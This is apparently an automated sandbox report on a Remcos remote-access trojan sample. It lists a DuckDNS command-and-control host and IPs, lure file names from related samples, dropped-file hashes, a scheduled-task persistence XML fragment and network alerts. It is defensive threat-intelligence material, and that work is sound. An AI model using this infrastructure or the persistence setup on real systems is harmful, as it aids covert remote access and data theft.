http://geoplugin.net/json.gp8: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000009.00000002.4038362161.0000000001065000.00000004.00000020.00020000.00000000.sdmp; not malicious; Avira URL Cloud: safe; reputation unknown
http://geoplugin.net/json.gp/C: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp; ZRuVeAoBoxootS.exe, 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp; not malicious; URL Reputation: safe; reputation unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1601575428.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp; ZRuVeAoBoxootS.exe, 0000000A.00000002.1677124907.00000000029C7000.00000004.00000800.00020000.00000000.sdmp; not malicious; URL Reputation: safe; reputation unknown

The json.gpB, json.gp8 and json.gp/C entries are string-extraction variants of http://geoplugin.net/json.gp with trailing bytes picked up from adjacent memory; they are the same indicator as the contacted URL, not separate endpoints.
Contacted public IPs (IP: Domain, Country, ASN, ASN Name, Malicious):
103.186.116.145: officerem.duckdns.org, country unknown, AS7575, AARNET-AS-AP (Australian Academic and Research Network), malicious
178.237.33.50: geoplugin.net, Netherlands, AS8455, ATOM86-AS ATOM86 NL, not malicious

Contacted private IPs:
127.0.0.1
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1518542
                Start date and time:2024-09-25 19:44:16 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 35s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:21
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                Detection:MAL
                Classification:mal100.rans.troj.spyw.evad.winEXE@21/16@2/3
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 179
                • Number of non-executed functions: 191
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, PID 5292 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
Time / Type / Description
13:45:36, API Interceptor: 4268375x Sleep call for process SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe modified
13:45:38, API Interceptor: 43x Sleep call for process powershell.exe modified
13:45:42, API Interceptor: 1x Sleep call for process ZRuVeAoBoxootS.exe modified
18:45:38, Task Scheduler: Run new task ZRuVeAoBoxootS, path C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
Context: other analyses that share an indicator with this sample (Match: Associated Sample Name / URL, Threat Name, Context). Every listed sample was detected as malicious.

IP 103.186.116.145:
SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exe (Remcos)
Quote best offer 20240911.exe (Remcos)
PO#0774.exe (Remcos)

IP 178.237.33.50 (context for every entry: geoplugin.net/json.gp):
https://maveuve.github.io/frlpodf/marynewreleasefax.html (Remcos)
file.exe (Remcos)
SDWLLRJcsY.exe (Remcos, GuLoader)
BL.xls (Remcos, PureLog Stealer)
z65orderrequest.bat.exe (GuLoader, Remcos)
Fwo62RjOqH.rtf (Remcos, PureLog Stealer)
1DUCJGrpyb.exe (Remcos)
1zbL83sqmd.rtf (Remcos, PureLog Stealer)
XjPA2pnUhC.exe (Remcos, DBatLoader)
AWS 1301241710.docx.doc (Remcos, PureLog Stealer)

Domain geoplugin.net (context for every entry: 178.237.33.50):
Marys Organizer 2023 Release.zip (Remcos)
https://maveuve.github.io/frlpodf/marynewreleasefax.html (Remcos)
file.exe (Remcos)
SDWLLRJcsY.exe (Remcos, GuLoader)
BL.xls (Remcos, PureLog Stealer)
z65orderrequest.bat.exe (GuLoader, Remcos)
Fwo62RjOqH.rtf (Remcos, PureLog Stealer)
1DUCJGrpyb.exe (Remcos)
1zbL83sqmd.rtf (Remcos, PureLog Stealer)
XjPA2pnUhC.exe (Remcos, DBatLoader)

Domain officerem.duckdns.org (context: IP the domain resolved to in that analysis):
SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exe (Remcos): 103.186.116.145
Quote best offer 20240911.exe (Remcos): 103.186.116.145
PO#0774.exe (Remcos): 103.186.116.145
Request Quotation.exe (Remcos, DBatLoader): 103.186.117.150
Request for quotation.exe (Remcos, DBatLoader): 103.186.117.150
SecuriteInfo.com.Trojan.Siggen29.4082.22291.17805.exe (Remcos, DBatLoader): 103.186.117.150
INV-012056.exe (Remcos, DBatLoader): 103.186.117.150
Enquiry 230424.bat (Remcos, DBatLoader): 23.95.235.29
Quotation 20242204.exe (Remcos, DBatLoader): 23.95.235.29
Quotation 20241804.exe (Remcos, DBatLoader): 23.95.235.29

The DuckDNS name has pointed at three different hosting IPs across these analyses (103.186.116.145, 103.186.117.150, 23.95.235.29), so the dynamic DNS hostname is the more durable indicator to hunt on than any single IP.

ASN AARNET-AS-AP, Australian Academic and Research Network (context: IP in that analysis):
rsJtZBgpwG.elf (Mirai): 103.128.198.80
https://dweb.link/ipfs/QmesssDqFnCTLy37t8Srcq12Tjchz4atRzkxjV2QTjw1sp/ (Unknown): 103.180.114.1
http://alicona.tbfs-industerial.com/auth/activeyg/3mail@b.c (Unknown): 103.191.241.218
http://uscwm.tbfs-industerial.com/activate/activeaG/3mail@b.c (Unknown): 103.191.241.218
SecuriteInfo.com.Trojan.Packed2.48025.19608.243.exe (Remcos): 103.186.116.145
QUOTATION.exe (Remcos): 103.186.117.77
SecuriteInfo.com.Linux.Siggen.9999.13221.8731.elf (Unknown): 103.160.46.122
Purchase Order.exe (Remcos): 103.186.117.126
Quotation_pdf.exe (Remcos): 103.186.117.126
jade.mpsl.elf (Mirai): 157.85.169.255

ASN ATOM86-AS ATOM86 NL (context for every entry: 178.237.33.50):
Marys Organizer 2023 Release.zip (Remcos)
https://maveuve.github.io/frlpodf/marynewreleasefax.html (Remcos)
file.exe (Remcos)
SDWLLRJcsY.exe (Remcos, GuLoader)
BL.xls (Remcos, PureLog Stealer)
z65orderrequest.bat.exe (GuLoader, Remcos)
Fwo62RjOqH.rtf (Remcos, PureLog Stealer)
1DUCJGrpyb.exe (Remcos)
1zbL83sqmd.rtf (Remcos, PureLog Stealer)
XjPA2pnUhC.exe (Remcos, DBatLoader)
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):962
                      Entropy (8bit):5.012309356796613
                      Encrypted:false
                      SSDEEP:12:tklu+mnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdbauKyGX85jvXhNlT3/7AcV9Wro
                      MD5:14B479958E659C5A4480548A393022AC
                      SHA1:CD0766C1DAB80656D469ABDB22917BE668622015
                      SHA-256:0F92BDD807D2F5C9947E1775A20231233043C171F62E1AFA705A7E7938909BFE
                      SHA-512:4E87CA47392DD9710F9E3D4A2124A34B41938986A4F43D50A48623DB1838C0D6CFF05FD2A23792DCD5A974A94416C97DC04ECEF85025FC785F3393B69A0B1DC5
                      Malicious:false
                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.380747059108785
                      Encrypted:false
                      SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//Z8vUyus:lGLHxvIIwLgZ2KRHWLOuggs
                      MD5:E5E9C3618702BF4DFB621AE99ED656DD
                      SHA1:EAB29C5E0F5D8F6EBAF77F2B3564D62C0EBBD7F2
                      SHA-256:B02E47FE68A5AE509C8C52CA65BBDF58363AAC3CBFF8FC20BB607BFECEBCE8E9
                      SHA-512:3396F58DD7E46582028DC514EEA8F6A52EC4E48D701F61AD5C7869C75EED2061D0104AE33566C010913BF55D899B1B62B790573DD529572346F3D18F4BF59553
                      Malicious:false
                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1573
                      Entropy (8bit):5.086572111551255
                      Encrypted:false
                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewj1v:HeLwYrFdOFzOz6dKrsuq+9
                      MD5:72B274802F3A16542B8D5B5BC3F2C16A
                      SHA1:BFC75865B1DCF10B3E937EA593CB2E473EEB1C9A
                      SHA-256:4C33342BBC14CF22E6DADAAD5F2CEC0D71F27DFC4C425D756D2AD6A78D910FEE
                      SHA-512:1FC04E67E37CA764158AEB04D0E3B3B8522FEE9466350B2C4B2BD36F124664F416EA97A5F3682FA7FAA1253F1D7AB20836230F75A5462B21BBD85D6145E5075D
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                      Process:C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1573
                      Entropy (8bit):5.086572111551255
                      Encrypted:false
                      SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTewj1v:HeLwYrFdOFzOz6dKrsuq+9
                      MD5:72B274802F3A16542B8D5B5BC3F2C16A
                      SHA1:BFC75865B1DCF10B3E937EA593CB2E473EEB1C9A
                      SHA-256:4C33342BBC14CF22E6DADAAD5F2CEC0D71F27DFC4C425D756D2AD6A78D910FEE
                      SHA-512:1FC04E67E37CA764158AEB04D0E3B3B8522FEE9466350B2C4B2BD36F124664F416EA97A5F3682FA7FAA1253F1D7AB20836230F75A5462B21BBD85D6145E5075D
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):918016
                      Entropy (8bit):7.88479063877033
                      Encrypted:false
                      SSDEEP:24576:12n4ze7gcvBx2mYa7sJw3+NHNQA6zqvkiINLYnTI:14gcvL2mT7sJw386pqvkiINc
                      MD5:64219E1931808919FD05DCFB458DFC25
                      SHA1:6ADB1561418BE08CCAA2E448166BC36673EC60C5
                      SHA-256:CEEBB7CA5ADBB69127CBF5205E49840C4846CB46E4C5AC568557E7BDF9FE315C
                      SHA-512:9CE694EAF780A4D255E328F527DF78C949A5C54B5AB0BA46C9800FD326E9AB0C29EEC331A1BC8A8592C159C99FCD69D165BAF4AB0D09B2D5CA6540F0E5BD527C
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 21%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....4...............0.................. ... ....@.. .......................`............@.....................................O.... .......................@..........p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......tS..lE...............c...........................................0..d.........}.....(.......(......s7...}.....sM...}.....sM...}.....sM...}......}......}.....~....}......(.....*.0.............o....sO...}.....{.........,n...}.....{.....o......{.....o......{.....{....oI....{....o....X.{....oK....{....o....Xs....o.......(....}.....*...0..Q..........o....sO...}.....{....,..{.......+....,&..{.....{.....{....oe.....{....o......*....0.............o....sO...}.....{....,..{....
                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.88479063877033
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
                      File size:918'016 bytes
                      MD5:64219e1931808919fd05dcfb458dfc25
                      SHA1:6adb1561418be08ccaa2e448166bc36673ec60c5
                      SHA256:ceebb7ca5adbb69127cbf5205e49840c4846cb46e4c5ac568557e7bdf9fe315c
                      SHA512:9ce694eaf780a4d255e328f527df78c949a5c54b5ab0ba46c9800fd326e9ab0c29eec331a1bc8a8592c159c99fcd69d165baf4ab0d09b2d5ca6540f0e5bd527c
                      SSDEEP:24576:12n4ze7gcvBx2mYa7sJw3+NHNQA6zqvkiINLYnTI:14gcvL2mT7sJw386pqvkiINc
                      TLSH:571512A1226AD516C5861BF80933D1F96A752DCABD22D30BDFEA7DDB383D3452980313
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....4...............0.................. ... ....@.. .......................`............@................................
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0x4e160a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0xFB34CD15 [Sun Jul 22 09:59:49 2103 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      Name                                  Virtual Address  Virtual Size  Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT          0xe15b5          0x4f          .text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0xe2000          0x5b4         .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0xe4000          0xc           .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG           0xdfca0          0x70          .text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                      Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
                      .text   0x2000           0xdf610       0xdf800   f8aac0be414b3651818428b8d3957a91  False     0.9469411965184564  DOS executable (COM)  7.889865290464799   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc   0xe2000          0x5b4         0x600     61bf71b8366c3be9177e35013a9affe1  False     0.4225260416666667  data                  4.096069102199715   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc  0xe4000          0xc           0x200     11ba020f01e9909d1ba91b6a0989d742  False     0.044921875         data                  0.09800417566270775 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      Name         RVA      Size   Type                                                                                Language  Country  ZLIB Complexity
                      RT_VERSION   0xe2090  0x324  data                                                                                                   0.43407960199004975
                      RT_MANIFEST  0xe23c4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
                      DLL          Import
                      mscoree.dll  _CorExeMain
                      Timestamp                         SID      Signature                                            Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                      2024-09-25T19:45:42.434528+0200   2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection          1         192.168.2.9  49709        103.186.116.145  52121      TCP
                      2024-09-25T19:45:46.455735+0200   2803304  ETPRO MALWARE Common Downloader Header Pattern HCa   3         192.168.2.9  49712        178.237.33.50    80         TCP
                      2024-09-25T19:49:02.169178+0200   2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection          1         192.168.2.9  49719        103.186.116.145  52121      TCP
                      2024-09-25T19:49:02.450423+0200   2036594  ET JA3 Hash - Remcos 3.x/4.x TLS Connection          1         192.168.2.9  49720        103.186.116.145  52121      TCP
